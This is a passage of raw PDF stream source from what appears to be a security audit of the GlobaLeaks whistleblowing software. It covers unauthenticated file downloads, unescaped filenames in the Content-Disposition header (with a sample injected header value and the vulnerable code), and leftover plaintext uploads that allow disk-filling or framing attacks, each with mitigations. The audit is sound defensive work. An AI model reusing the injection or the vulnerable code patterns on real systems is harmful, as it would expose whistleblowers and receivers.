BT 1 0 0 1 0 110 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (uuid4) Tj (\(\)\)) Tj  T*  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_val) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (id_val) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_type) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('rtip') Tj 0 0 0 rg ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# this is just a debug/informative information) Tj /F3 10 Tf 0 0 0 rg  T*  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (expireCallbacks) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj ([]) Tj  T*  T* (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj (]) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj 0 0 0 rg  T*  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (_expireCall) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (reactor) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (callLater) Tj (\() Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (tokenTimeout) Tj (,) Tj ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (expire) Tj (\)) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 100.1849 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Likewise, in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (Download ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (@unauthenticated) Tj /F1 10 Tf (:) Tj T* ET
Q
Q
 
endstream
endobj
% 'R360': class PDFStream 
360 0 obj
% page stream
<< /Length 4528 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 679.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 84 re B*
Q
q
BT 1 0 0 1 0 62 Tm 12 TL /F3 10 Tf .666667 .133333 1 rg (@transport_security_check) Tj 0 0 0 rg (\() Tj .729412 .129412 .129412 rg ('wb') Tj 0 0 0 rg (\)) Tj  T* .666667 .133333 1 rg (@unauthenticated) Tj 0 0 0 rg  T* .666667 .133333 1 rg (@inlineCallbacks) Tj 0 0 0 rg  T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (,) Tj ( ) Tj (tip_id) Tj (,) Tj ( ) Tj (rfile_token) Tj (,) Tj ( ) Tj .4 .4 .4 rg (*) Tj 0 0 0 rg (uriargs) Tj (\):) Tj  T*  T* (    ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# tip_id needed to authorized the download) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 635.8236 cm
q
BT 1 0 0 1 0 26 Tm 1.045697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The comment is incorrect: for ) Tj /F3 10 Tf (tip_id ) Tj /F1 10 Tf (the attacker need only supply a string matching ) Tj /F3 10 Tf (uuid_regexp) Tj T* 0 Tw 3.91664 Tw /F1 10 Tf (from ) Tj /F3 10 Tf (globaleaks/handlers/base.py) Tj /F1 10 Tf (. Like the collection token, ) Tj /F3 10 Tf (rfile_token ) Tj /F1 10 Tf (must match a) Tj T* 0 Tw /F3 10 Tf (uuid4\(\) ) Tj /F1 10 Tf (generated and set to expire in ) Tj /F3 10 Tf (globaleaks/handlers/base.py) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 593.8236 cm
q
BT 1 0 0 1 0 26 Tm 1.233735 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(We considered whether ) Tj /F3 10 Tf (callLater ) Tj /F1 10 Tf (to expire the token might be problematic as well: if the server is) Tj T* 0 Tw 1.156457 Tw (restarted before the expiration, could the URL still be valid? But no, the expirations and the tokens are) Tj T* 0 Tw (both lost in that case.\)) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 575.8236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 533.8236 cm
q
BT 1 0 0 1 0 26 Tm 2.54229 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should mitigate ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets) Tj T* 0 Tw 1.690888 Tw (Through Side-Channel Attacks ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (Issue K: Secrets Generated with Non-CSPRNG) Tj 0 0 0 rg (. Receivers should) Tj T* 0 Tw (clear their browser's history and cache after downloading files.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 515.8236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 485.8236 cm
q
BT 1 0 0 1 0 14 Tm 1.541235 Tw 12 TL /F1 10 Tf 0 0 0 rg (To fix this issue, ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (should check that the user is authenticated \(logged in\) and should have) Tj T* 0 Tw (access to the file:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 479.8236 cm
Q
q
1 0 0 1 62.69291 479.8236 cm
Q
q
1 0 0 1 62.69291 467.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Check the downloader's ) Tj /F3 10 Tf (role) Tj /F1 10 Tf (. It should be ) Tj /F3 10 Tf (receiver) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 461.8236 cm
Q
q
1 0 0 1 62.69291 425.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.531235 Tw (Track which files each receiver should have access to, to check against when a receiver tries to) Tj T* 0 Tw 3.446651 Tw (download files. Each receiver should have access only to those files granted to them by a) Tj T* 0 Tw (whistleblower.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 425.8236 cm
Q
q
1 0 0 1 62.69291 407.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 401.8236 cm
Q
q
1 0 0 1 62.69291 401.8236 cm
Q
q
1 0 0 1 62.69291 389.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #826) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 389.8236 cm
Q
q
1 0 0 1 62.69291 389.8236 cm
Q
 
endstream
endobj
% 'R361': class PDFStream 
361 0 obj
% page stream
<< /Length 8669 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue G. Unescaped Characters Put Into ) Tj /F8 12.5 Tf (Content-Disposition ) Tj /F5 12.5 Tf (Header) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 690.0236 cm
q
BT 1 0 0 1 0 26 Tm .930574 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (When the whistleblower uploads a file, they provide its file name. That file name is stored in) Tj T* 0 Tw .495984 Tw (the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (database. When the receiver downloads the file, the name provided will be reflected into) Tj T* 0 Tw (the HTTP headers that are sent to the receiver, without being escaped.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 648.0236 cm
q
BT 1 0 0 1 0 26 Tm 1.96186 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (It may be possible to perform an HTTP response splitting attack on a receiver, which could) Tj T* 0 Tw .374692 Tw (enable cross-site scripting attacks. We have not confirmed that it is possible, since it may not be possible) Tj T* 0 Tw (to inject newlines into the header, but it is prudent to assume that it is exploitable.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 618.0236 cm
q
BT 1 0 0 1 0 14 Tm .134987 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to have uploaded a file with a name of their choice, then have the) Tj T* 0 Tw (victim receiver download the file.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 588.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.485697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The attacker simply needs to use the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (whistleblower interface to upload a file.) Tj T* 0 Tw (They may use a browser extension like ) Tj /F4 10 Tf (TamperData ) Tj /F1 10 Tf (to choose a custom filename.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 546.0236 cm
q
BT 1 0 0 1 0 26 Tm .852126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection and by trying it with the ) Tj /F4 10 Tf (TamperData ) Tj /F1 10 Tf (Firefox extension.) Tj T* 0 Tw 2.089984 Tw (We verified that characters pass into the filename without escaping, but did not verify that response) Tj T* 0 Tw (splitting is possible.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 528.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 498.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.773059 Tw 12 TL /F1 10 Tf 0 0 0 rg (There are two places where the uploaded filename is added to the ) Tj /F3 10 Tf (Content-Disposition ) Tj /F1 10 Tf (header) Tj T* 0 Tw (without being escaped. First, in ) Tj /F3 10 Tf (handlers/files.py) Tj /F1 10 Tf (:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 423.5195 cm
q
q
.908526 0 0 .908526 0 0 cm
q
1 0 0 1 6.6 7.264512 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 516 72 re B*
Q
q
BT 1 0 0 1 0 50 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('X-Download-Options') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('noopen') Tj 0 0 0 rg (\)) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Type') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('application/octet-stream') Tj 0 0 0 rg (\)) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Length') Tj 0 0 0 rg (,) Tj ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('size') Tj 0 0 0 rg (]\)) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Etag') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('") Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ("') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('sha2sum') Tj 0 0 0 rg (]\)) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (%s) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('name') Tj 0 0 0 rg (]\)) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 403.5195 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Second, in ) Tj /F3 10 Tf (handlers/collection.py) Tj /F1 10 Tf (:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 334.3195 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 60 re B*
Q
q
BT 1 0 0 1 0 38 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('X-Download-Options') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('noopen') Tj 0 0 0 rg (\)) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Type') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('application/octet-stream') Tj 0 0 0 rg (\)) Tj  T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg  T* (    ) Tj (opts) Tj ([) Tj .729412 .129412 .129412 rg ('filename') Tj 0 0 0 rg (]) Tj ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (') Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg (\)) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 314.3195 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The attacker can upload a file, setting the Content-Disposition header to:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 281.1195 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 24 re B*
Q
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (Content-Disposition: attachment; filename="test"; size="1000000000") Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 249.1195 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.037485 Tw (When the receiver downloads the file, the header will be as follows. The "size" parameter has been) Tj T* 0 Tw (injected:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 215.9195 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 24 re B*
Q
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (Content-Disposition: attachment; filename="test"; size="1000000000") Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 195.9195 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If the receiver has a PGP key, the server will append ".pgp" to the header.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 141.9195 cm
q
BT 1 0 0 1 0 38 Tm .220751 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also note that the HTTP headers are parsed incorrectly in ) Tj /F3 10 Tf (globaleaks/handlers/base.py ) Tj /F1 10 Tf (in the) Tj T* 0 Tw 11.62098 Tw /F3 10 Tf (_on_headers\(\) ) Tj /F1 10 Tf (method. The following regular expression is used to parse the) Tj T* 0 Tw .893555 Tw /F3 10 Tf (Content-Disposition: ) Tj /F1 10 Tf (header; it is incorrect because it matches all characters up to the ) Tj /F4 10 Tf (last ) Tj /F1 10 Tf (quote,) Tj T* 0 Tw (when it should match all characters up to the ) Tj /F4 10 Tf (next ) Tj /F1 10 Tf (non-escaped quote.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 96.7195 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 36 re B*
Q
q
BT 1 0 0 1 0 14 Tm 12 TL /F3 10 Tf 0 0 0 rg (content_disposition_re) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (re) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (compile) Tj (\() Tj .729412 .129412 .129412 rg (r"attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (\(.+\)) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg (,) Tj  T* (                                    ) Tj (re) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (IGNORECASE) Tj (\)) Tj T* ET
Q
Q
Q
Q
Q
 
endstream
endobj
% 'R362': class PDFStream 
362 0 obj
% page stream
<< /Length 3249 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 717.0236 cm
q
BT 1 0 0 1 0 38 Tm .328221 Tw 12 TL /F1 10 Tf 0 0 0 rg (When the whistleblower uploads a file with special characters in it, it appears to be ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-encoded, but this) Tj T* 0 Tw 2.847045 Tw (is only because the browser \(or JavaScript\) is ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-encoding it as it is sent. The server does not) Tj T* 0 Tw .778651 Tw /F3 10 Tf (URL) Tj /F1 10 Tf (-decode the filename upon receiving the upload, so special characters in the filename are shown as) Tj T* 0 Tw (percent escape codes in the user interface.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 699.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 669.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.46561 Tw 12 TL /F1 10 Tf 0 0 0 rg (There is no easy way \(i.e. that doesn't involve modifying the source code\) for a ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node) Tj T* 0 Tw (administrator to mitigate this issue.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 639.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .536235 Tw (The filename is displayed to the receiver before they download it, so receivers can protect themselves to) Tj T* 0 Tw (some degree by refusing to download files with odd-looking names.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 621.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 567.0236 cm
q
BT 1 0 0 1 0 38 Tm .43061 Tw 12 TL /F1 10 Tf 0 0 0 rg (We recommend not storing the submitted file name at all, and instead having ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (choose the file) Tj T* 0 Tw 1.109069 Tw (names \(e.g. ) Tj /F3 10 Tf (Upload1.zip) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (Upload2.zip) Tj /F1 10 Tf (...\). This worsens usability; but discarding the filename does) Tj T* 0 Tw 1.99311 Tw (fix this issue, with the additional benefit of not disclosing the uploaded filenames to an attacker who) Tj T* 0 Tw (compromises the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 525.0236 cm
q
BT 1 0 0 1 0 26 Tm .414983 Tw 12 TL /F1 10 Tf 0 0 0 rg (If using ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (-chosen filenames is too much of a usability problem, then we recommend specifying) Tj T* 0 Tw 3.82284 Tw (the file name in the ) Tj /F3 10 Tf (URL ) Tj /F1 10 Tf (instead of the ) Tj /F3 10 Tf (Content-Disposition ) Tj /F1 10 Tf (header, as described in ) Tj 0 0 .501961 rg (this) Tj T* 0 Tw (StackOverflow answer) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 507.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed, but may need further analysis.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 501.0236 cm
Q
q
1 0 0 1 62.69291 501.0236 cm
Q
q
1 0 0 1 62.69291 489.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #832) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 489.0236 cm
Q
q
1 0 0 1 62.69291 489.0236 cm
Q
 
endstream
endobj
% 'R363': class PDFStream 
363 0 obj
% page stream
<< /Length 4222 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 735.0236 cm
q
BT 1 0 0 1 0 17.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue H. Plaintext File Kept on Server when Whistleblower Does Not Finish) Tj T* (Submitting Tip) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 717.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 687.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.85561 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (If a Tip submission is aborted prior to completion, but after file upload, the uploaded files) Tj T* 0 Tw (remain indefinitely.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 669.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (Malicious remote attackers can cause Denial of Service by consuming all hard drive space.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 627.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .461984 Tw (A malicious remote attacker may place incriminating plaintext on a Node hard drive without knowledge of) Tj T* 0 Tw 2.23811 Tw (the Node admin or other users, in order to frame the Node administrator in a subsequent forensics) Tj T* 0 Tw (investigation.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 597.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .08686 Tw (A Whistleblower may change their mind while submitting a Tip, and falsely believe their submitted files are) Tj T* 0 Tw (removed if they do not complete the submission.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 555.0236 cm
q
BT 1 0 0 1 0 26 Tm .423984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (A remote attacker needs only an ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (connection to the Node, potentially over ) Tj /F4 10 Tf (Tor) Tj /F1 10 Tf (.) Tj T* 0 Tw 1.432209 Tw (To perform a Denial of Service, an attacker may need a large amount of bandwidth or a long enough) Tj T* 0 Tw (period of attack.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 525.0236 cm
q
BT 1 0 0 1 0 14 Tm .05061 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (An attack intending to frame a Node requires very few resources to place the incriminating file) Tj T* 0 Tw (through this vulnerability, although a subsequent forensics investigation implies some separate attack.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 483.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.092765 Tw (A Denial of Service attack requires either a high bandwidth or a long time of attack, depending on disk) Tj T* 0 Tw .031163 Tw (size, but because an attacker can trade-off bandwidth for time, we predict it's quite feasible there would be) Tj T* 0 Tw (sufficiently motivated attackers.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 441.0236 cm
q
BT 1 0 0 1 0 26 Tm 3.114983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This issue was verified by uploading a file, then closing the browser before actually) Tj T* 0 Tw 9.337674 Tw (submitting the Tip. Even after waiting a few days, the uploaded file remained in) Tj T* 0 Tw /F3 10 Tf (/var/globaleaks/files/submission) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 399.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.153672 Tw (This leaves the possibility it might be getting deleted after, say, a few weeks. This may still lead to the) Tj T* 0 Tw 1.315814 Tw (vulnerability Impacts mentioned above. We accordingly searched through the code, without finding any) Tj T* 0 Tw (logic that would delete the file.) Tj T* ET
Q
Q
q
1 0 0 1 96.9978 150.1436 cm
q
401.28 0 0 242.88 0 0 cm
/FormXob.3504796935e9b1b0d34a034172872e63 Do
Q
Q
q
1 0 0 1 62.69291 132.1436 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 78.14362 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .833516 Tw (When a Whistleblower uploads a file, it is written to the filesystem in plain text. When the Whistleblower) Tj T* 0 Tw 3.609984 Tw (submits the Tip, the file is encrypted and the originally-uploaded file is deleted. However, if the) Tj T* 0 Tw .216654 Tw (Whistleblower chooses not to submit the Tip after they've uploaded a file, it will remain on disk in plaintext) Tj T* 0 Tw (indefinitely.) Tj T* ET
Q
Q
 
endstream
endobj
% 'R364': class PDFStream 
364 0 obj
% page stream
<< /Length 4719 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 729.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .413171 Tw (We did not have time to do an in-depth search for the code relevant to this issue. It may be the case that) Tj T* 0 Tw .877209 Tw (the files are removed after a long period of time, and we just missed that code. However, even keeping) Tj T* 0 Tw (the files for a few days after they are uploaded is a security risk.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 711.0236 cm
q
0 0 0 rg
